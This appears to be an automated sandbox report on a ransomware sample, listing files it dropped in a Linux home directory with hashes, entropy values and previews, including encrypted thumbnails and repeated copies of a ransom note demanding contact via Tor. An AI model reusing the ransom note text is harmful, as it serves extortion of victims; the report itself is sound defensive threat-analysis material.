                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.thumbnails/normal/12095cb0c16f1a0895ab343c7eb4b7c6.png
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):11017
                  Entropy (8bit):7.976022135830061
                  Encrypted:false
                  SSDEEP:192:WQD351thYbkjmuCRf96Fw9PDia8/qjL5dk1fuGfqhO6NbHk1a8K:dD351tagjmj96S9PS/q/5dfAqSa8K
                  MD5:970433F22036F642E9B5817ACD3E24C0
                  SHA1:9A50FBEC6EACCDBB3018150CECB20F095ABD87F5
                  SHA-256:C73F1652BAF3705F422D5876DC51FC6D108F0616D4A0A56EEE87557CACB93A1C
                  SHA-512:D8F82FE6E92BDC34C3237758B43BFB9A62977773AD2416ADE11BFD3EC8E0AD413AB1C1E047A9D89B9EC78DCE99654DB4CFC25338C5077F4878AE3FD49B43A3F4
                  Malicious:false
                  Reputation:low
                  Preview: ..O..v.V.....:.{...#.M.3.a&4..S/...#.WV......D`.....W.......1|..bk.O..]..W.....c.Ytc..{.......JxU.u.....gc>....b.i.S....@5.U.67V..=..Y..oo.(.)...!)/...[s'(................#..L.<.g.HrW.....s..^QKR........f.c..|.5=.Cf2X..........lk..{.i.E.otZ(..."".Q...Cv.|.V...........<...{(...9....../...56h)r....=....Zi}.OC..k..I.l..).=.2.s..._.T."V..Q..6.....c....... ~I.OfI.....0&.|..f...2....".....g... .......E..]..Z......>p.<5...b..Q.....c....,..(3....W#8J+.(..wV......<T..,..L&r.d....KN."8.iW.$...s.8..-.S.a8b;........n....U....Lx.WGa[.....T.2...C~...|N.d.n" !z . ....LX...&p/.]kH,..|.*D.S....X....e..&..84....."...6.2.C...`.+.~./+0..h.jl..ep....h.....E.T..AL...3...E8...pA=./T..G....QC...~-....]..^V^..!.......AG.l;.O.~.C7.V.I.ZH+?........6....da.[.U.w.'R.o...=..%.FIR......../q.B..<......?...-.....6E...p.?R.#.....}.=....h......Pa<..~.C......$S....W.x, .K.=U.".Y..........4..EJ.r.G.......'.C"....Y.I..{...G...x..db.m......C..E..$4W}.!..H#R..s...:4.9......*.s..X....D...(..#.(.*.2].......+...+N..f...-x...$i4
                  /home/user/.thumbnails/normal/203a169dec3216fbb03bc6760e7d0f9a.png
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):11159
                  Entropy (8bit):7.9705155638506655
                  Encrypted:false
                  SSDEEP:192:jBoutABs9NfcDIyIvYVpMgQtDUMlgyDCbVDBLjz8E/4bTsMOT:juui80NIvGpMgQZUPyWh9nGNOT
                  MD5:089673FD45A3165FB29DAE2F71A178A4
                  SHA1:208B6F7556D4B31306DCA742843603577D87CE3F
                  SHA-256:EFEA08F708A8A0383BF8B91523E3DA61A6154E791846BFDBA380E93410A73B3F
                  SHA-512:FF26A99AED5FCFF393A13459F19DA1670355F266265C711B0AD0E57A79ABA34C6105D8BCC36C2D7603D6D0A7EA4029813506F1F649201C82C69C858782EC5381
                  Malicious:false
                  Reputation:low
                  Preview: .rI.]n9.^...\|....J....3i2...(.....Z..u.........m.h.........9l..i.pQU.`%.....c...n...6...1XEK....;.s..T.c@b_.....k{I....5..._3..O..{...f4.d....%S.30..|.ar.p.y....z....+.....Ri...nt..k.Lf.M.d...&..I......t.............^.........Z.v"....V..QF..v..."...W..F.....X../h..m[..jZCs....O.P.D.)/[.......-u=... $]\W.s($..<....N*....J..9...u.H6e....{23.A.....m..........y~@.............."_F<.x.A/...&.Vgv...m...C?....z..".@..E8.......)....F...P..!.`D...},....<.P.....H.x0..3d-k.R.#...;e~G#8G+....UdZ.v20........D..J.,.......%Z..m.S.X..w{1........L...l7.o...pc/....4<...%....r%.o.......Qm.lc...K..:.?...[V....G...i...j.......8......u.......A|.yg.b..#o.......YS^........J.......5:.......41[.3.,../.iX..5j.:SNa....E$..R....R.#..B.]H..8I>.L0{...Q....+./NC..F.......g.....8..n.....v....nGk...$.......Q.K.*.r...'....._.A....s.....x....K..ln...,...!.....WP.kn......%...&.`...=.\).*.+9.....|.....>.tp..h.(g.trX.....;.....t...,R..1...B.....H...5....@.....P....M.....C..h..J.p.^........J_..Ir<)Cb.......p.m.....W4/...?w^.
                  /home/user/.thumbnails/normal/2454247923350b5d65d258305ccf59ce.png
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):13231
                  Entropy (8bit):7.978129914351935
                  Encrypted:false
                  SSDEEP:384:KgSRYsZrhnRagm60Ke3GOsDVgGE44a4/+/mw4gDk5:KNrhnWQe3GOeVO44a4/+/3/Dk5
                  MD5:FC3C74F18D873261734610BC9F45BB31
                  SHA1:6BFE34F434A43997B84412DEA0AA035305E4C058
                  SHA-256:003C4958595A2D8CCB04FC7FA1402F48256E432269E322F3315A3C34B8F522E9
                  SHA-512:BA04355B33816887F3B4EC50450B3B482C5E378ACC1865360E8572915F7D06B299ECC5C9778DAA5EB89535CACE319BE7E6E662DF7C1809E81876F37A2EB6A8E8
                  Malicious:false
                  Reputation:low
                  Preview: ./.b...`n..1lP>.ObB..t.R..S..8....T.m.BG..`..T7i:G..ys.......Xn'.b%.n.).`..afi..A>.._.....TO.0..U...#K...n1d`|..85T.6........i0..t..R..f..,j.=..LE...L........Jt.=@#W\4M...\.s. W..s....0..rC....vf.*..PO).....dZ..s.....@.....[.....)w.'7.......a.:=...^... Fm......39dI9....,UA..hr.Y..g@..../.7...ABI.(..=Z...-....0..dC.....oYx.].mf[.+.....+.K.^.8..o..i..d.....3Zr....<l.E...Ym.&2....+..&>.a9.../....J]L....Z..!.7......}.^0..kt..Y/..?o..7..C.R..K..'w.}..o..a..."n....*.};....G.f@.z.+..U.D.....q...L!... 9;8.....s..JZZ.?..w..cW.t0....../.>of......J..2.E6@.W..5.SZR..z..).eIu<E...@......Y] .W.....................q..p..A.#.OR[...:\.D..v....^.N@...i6J.n.=.R6.k.c..#..@...-.98.(n....[S<."......G.&.u.K...S..Uh~..5....V..2..M)DY5J'A...*q%...A...L.?R....A..iS...........3:x.Y2hO.....0..i....O..!...2k~..]...h.$W<....%..\.......M;......B...S ....D....V[Z.....~.sr.s#.`d..j.......S.dK.Z...S..]|....M.}..8.Dl..P.....9.'xT..j..-Ew,wrr.....U...Ry.......O......M....N.9{....2.T..)y.....n..q....\.!._C....n...k.......
                  /home/user/.thumbnails/normal/6635e1111ee0cd4813b439af8913fa49.png
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):7022
                  Entropy (8bit):7.951763360076597
                  Encrypted:false
                  SSDEEP:192:ct85nA9lrTVr5ajjcmigQWKM1b9MTTwn7y0ovYGrrYsqNkec:rn+rTun9QWKqbSHw20cYGvJR
                  MD5:EA26D96D0955343D3A01F01E51BB2B24
                  SHA1:A8C4B29328052E177B5F899B775541173AD3E12C
                  SHA-256:1B9163CB1785AF8846EC5574D91027280D6CAAAFA648F0106099914DEC005C43
                  SHA-512:966E75922748BE3E2A80CFEBF25EB937DA7EFF9A80B13FF50B1F5FDC7743D6FA9B4B73B00D048E8753F779B72D4D496CAA7F44E4BF915C842201502D6EE223F4
                  Malicious:false
                  Reputation:low
                  Preview: .St.*o...`.j+...fR..DN.OQ..i....6....:5.....V^....../.I...g..Q.W:.rb\y....".....:fl.....^.^.....:.:...h.+..r..y...w..u>......b...|....V..A..y........~.r.@3R........m.u.Z.m-K.{.....Y..G...OgA.?.."....2#*.....5n....Y|#)JO..m.T..........A..\K.*.....bWQ..d....W.E.`cU.,r[..C....j.M.....<.j.....~.c.......m. ...Z.2...7[.=..O...E'..M3i.I....9t...?...jEz.l..~4.Ts....1.....4.5......oz[...H.z..3....W......Ou2&...Dx......-..>9T..@.nP.7.v3OE4..$.o.~/L.i2...8...K!y.."..GQ..1+.~z.}..,r.Pm.....-.".......m.E.....i/.`....QD..~......0......,.1`<B.../Sq*Bw].Ze.5w.j...+.6...L.............KUX.:K.o.>..xST8J~v.F..!..U.%...f.....R..`.U..,.....B....F...*.s........u.O.MR....L/... ..hKOy...+.....u.W....B*...U%3-.o[......p..n.L.d%.....V[....RD...k.m.hJ.<...zLBp.f.r...:!~k...h..uAwuh.......a...Aj..".S...%.....W).N.0]v/.x..U.|."r....z../...rM!.r..f."y....y.}....3;._.....D......h~.-....5XM.i....2...AE;....!,........!..DK&...o1.X..*...........h..)...o.....z... .Kc..y.wL..A,.z.......1.\......i.^..G./.| ...;..}p........
                  /home/user/.thumbnails/normal/d7de604c8b54b08bf50a3c2c28efd2df.png
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):6700
                  Entropy (8bit):7.95261103422809
                  Encrypted:false
                  SSDEEP:192:5vILoqIQbvMynifKsATAscJLgyCESioBlPZAtBcamE8m:lIbIcvMcUuTAs0LT6Y2m
                  MD5:F90549CC50F6749AE0A878D39239F861
                  SHA1:6587E83F9C51A50142F937C4BB6597CFA06E7FA8
                  SHA-256:ED31AB446D64733AF3D72CB723F118F55CA11CBD451959E6432B9DC43B69939A
                  SHA-512:262A04063521085F5193851A29B4B21A05B393A3E285746128235617940759E3A895DE7F5B38D734C4C250E83C26DD9B265FE3B5B0D0D30724BA104D58C601A6
                  Malicious:false
                  Reputation:low
                  Preview: ..h......YG....3...;_......+..HX..HV....BM .u...+...../V.....%.&U.d.E.`.i......a.N....#.-..]...J..d[.mYV...2......}..'n....15.Cu.......L.k._X......)(.c..ob.nN..{..v....i...N....30(..c...{..........O3.&.C...-..F..e....=t.aZ.Ff.?......o....<.3.......B['|. 1-...~.+.~{.......&....6.J[...@.S..B..].....R.<..d.D..G..vY..F...[....t.f.U.P*J...M$.1..._.. S..D...dfR..g...^....Ew..c..a2.. 2.C..d......E)$...G.wv.....E./.hw-..d..._.I......XDmwtw>..*....z..PJ.Ut2s...3.u....&;.e....Fl.'..#.#..tz..|B.j.........p|.z..c.c...=.>..%.D.._....&.........az....B.....3..6.=.....~.?....Vk5.`.OA.~.2$4..j..J.(..7....f.j.....e8.#.m..].....8.......`.I.{!u.K.../..9(&...&..,..E..3V...rP.Y..n.....A....+.c..nQ.Tj..1..#p..`..J0..j8L.......R .y...w..db..^fo&.u.U..^...-.9e.s.T.pd..~N..l.........&..5..3....3.{.........G8 .U..>..(`...pU.Z.AyD...l.....?.."..+.LG.]..EO....V...X\.}cu.=.__....V~.Rgl1LK..*.2../...b. .<..&.m.d.........3.....%=.C).'9.&....m.b....b.=.4....k..p....*...^K.!.a..e..%h..|...vN....*|dB[.....(...9.....(-/.
                  /home/user/.thumbnails/normal/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.thumbnails/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.xscreensaver
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):8331
                  Entropy (8bit):7.96456565925635
                  Encrypted:false
                  SSDEEP:192:w6Qekrya7AtBol4kxI0wgMU2d1G9dNAiEQt8jjP6kvuqN3JInp:w6Q6a76aldm0wgMZd1idq55PhuS50p
                  MD5:A254E160056DBA86B14425E5D88BD8DC
                  SHA1:292FF12332A44E15DB9055A9DDC678EEC956F538
                  SHA-256:717BFE1E4145DFC0586CA477AC5B2E5FCCC7FB7B43F73667350EDD420A85486F
                  SHA-512:EAD224D206D77FDD2552E23CDFE44FE53EA9668C73A905F1E223C697E07A1001E222FA44E63E41BA15A4C3E03D0C909B6B258EC63E5B7405F884CF93E73733DE
                  Malicious:false
                  Reputation:low
                  Preview: ......1C...._`:.aNQ...VT>.oeV.C.....(......l1Z?y...v..2.`..j?.S7..}.....-....&.....$.5.4.f..y....C..a.......~.|y.{._.......E.k..,..nN..J..h..V....y.......!...._'....*,+.1?.....b...z..P....%..5.....rT.....\...CX.W..$. ~|]...@d$..]..~...6.....e.Pd...g.E.*...a..............[...J...l.?......-........?.t......a../B...p.D".)....s27.N.....u.....S..h:.$...t.g..).g8..(..._..|_^*.I..*.N.......p"t.FI.oiv...*....c /!....V;\S].....Q5.{....h.h...uj...o..8.P.........Y......D.%J.....v.....-!n..:.@...@.....WGw.q...#....Ip.?.tHC>.R.......:.>.L...b.q......#2.....9L.oZJx.`..%........E..zfg...!R..Z.m..pS.o.F.'#l......"2.n..cgRR2.......^`../<..A.gO.....nj....S.-R.@...o0....v..86....9..s...-.....K..1.]...b...W..Z./,O+sA.7Y....XV.y)4...8Bot...c.\..4s<W..h0..K...^.......}...i.pq..%.....7......I.^......4E...m{.T....._..k.c<...?..j....x.(}.sV. ....^ww.....[..........&-..9h............"aW+....r@?g.;....#.f.......>..\|...{.~.D.o....sP...+!...,..p..b..q..K.M)u....s.Y..(wX<TT....N..Pq.-..A....k.'........j..%.".&.l..
                  /home/user/.xsession-errors
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):314
                  Entropy (8bit):5.745831689153081
                  Encrypted:false
                  SSDEEP:6:oOG8Z33S11zmhOO/EUyp6Xc2fX+hsL8keB:oOGeS2DcUBj/lL8vB
                  MD5:0BD5E8E3D1E4071780D04E4B923CE0F9
                  SHA1:691806265D7ED12DA12F5E7A3ED72273A1C50BEA
                  SHA-256:82FC6BE1B37BCF4EAB987C47904C4DCDE4745C7AC929E9F9F650FB30D02990AF
                  SHA-512:1AF9172B74A0BCBB5C320D0A9FC7E40221E958B4D908710F8C82D46B8ECDD674152B18CB3348F3B102F9BDB0A4E9C2C0E2E0B79F6D5A8451A5EA4BB0EDF02223
                  Malicious:false
                  Reputation:low
                  Preview: ..o.0.~...ir.<.jL.7j..o....@..VmR..*.l...2...$.!....-P.J`.....k..;.........._D/...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................n!....e.N..O.JRa....I...Z.^;%......fV...........Dh.`
                  /home/user/.xsession-errors.old
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):314
                  Entropy (8bit):5.743586885105231
                  Encrypted:false
                  SSDEEP:3:VsmviI3Nq5acSAESPW8d0I/VJvfb7PmWE9CiYa1ESghgEUMzpET77cP12OYkHqd2:fvfq5Xa8dL1zmhOO/EUyp6XcQlHKcDa
                  MD5:DD6C9EA3601BDEA1DD7F06BCB8939FBD
                  SHA1:157185DD15A7AAF9AC59A59EE9152E9A2B84CF77
                  SHA-256:52D6AD937402899015F2C03749E3087D4DD4B7DBE513CC79B36CB539389DC3D3
                  SHA-512:46C4E007C58D3138B3E1622077A20775AE1587BEC75FFD4C142C8CED0D823F3756261C0654FEA2D0A08A863D8A42707358C2E99BC6B7A859922B4EBD17CECD5A
                  Malicious:false
                  Reputation:low
                  Preview: v.../f|.......a..N.6.I.S......&....m^.:..$...F.&.....8....e.v........do{g-f....w..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................f.P.....W.x....2.....y...[.~Z.2.?(.c+jc..BP..........\W
                  /home/user/Desktop/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/Documents/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/Downloads/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/Music/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/Pictures/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/Public/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/Templates/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/Videos/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
